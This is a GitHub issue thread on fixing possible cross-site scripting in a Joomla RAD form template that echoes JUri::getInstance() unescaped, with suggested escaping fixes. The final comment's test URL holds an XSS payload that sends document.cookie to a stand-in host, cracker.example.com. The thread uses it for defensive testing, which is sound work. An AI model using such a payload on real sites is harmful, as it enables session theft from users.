### ISSUE TITLE
Do not use JUri::getInstance() in form

### ISSUE THREAD

**Issue by asika32764** [ventoviro/windwalker-joomla-rad#109]
See: http://xyz.cinc.biz/2013/11/php-xss.html

**Comment by bblurock** [comment]
If I understand correct, 

For example, replace 
```php
<form action="<?php echo JUri::getInstance(); ?>" method="post" name="adminForm" id="adminForm" enctype="multipart/form-data">
``` 

with 
```php
<form action="<?php echo htmlspecialchars(JUri::getInstance()); ?>" method="post" name="adminForm" id="adminForm" enctype="multipart/form-data">
```
is that correct? If so I can make a PR.

[source](https://github.com/ventoviro/windwalker-joomla-rad/blob/dd92ee22a5f961c72125d9463fabcab1eb4c34f0/bundles/GeneratorBundle/Template/component/default/site/view/%7B%7Bcontroller.item.name.lower%7D%7D/tmpl/default.php#L28)

**Comment by asika32764** [comment]
I'm not sure it is enough to protect user from XSS attack, but you can try it if this way can escape the injection code.

**Comment by asika32764** [comment]
In Joomla we will use `$this->escape(JUri::getInstance())`

**Comment by asika32764** [comment]
It seems `JUri` will auto escaped invalid chars
https://github.com/joomla/joomla-cms/blob/staging/libraries/joomla/uri/uri.php#L106

![rad_development_-_ _-_sakura_](https://cloud.githubusercontent.com/assets/1639206/12873069/5481df0a-cdef-11e5-95c5-27e4beab6d30.jpg)

**Comment by asika32764** [comment]
Test URL
```
http://localhost/joomlarad/administrator/index.php?option=com_flower&view=sakura&layout=edit&id=7&q=%22%3E%3Cscript%20type=%27text/javascript%27%3Enew%20Image%28%29.src=%27http://cracker.example.com/xss.php%3Fusercookie=%27+encodeURIComponent%28document.cookie%29;%3C/script%3E%3Cbr%20class=%22
```
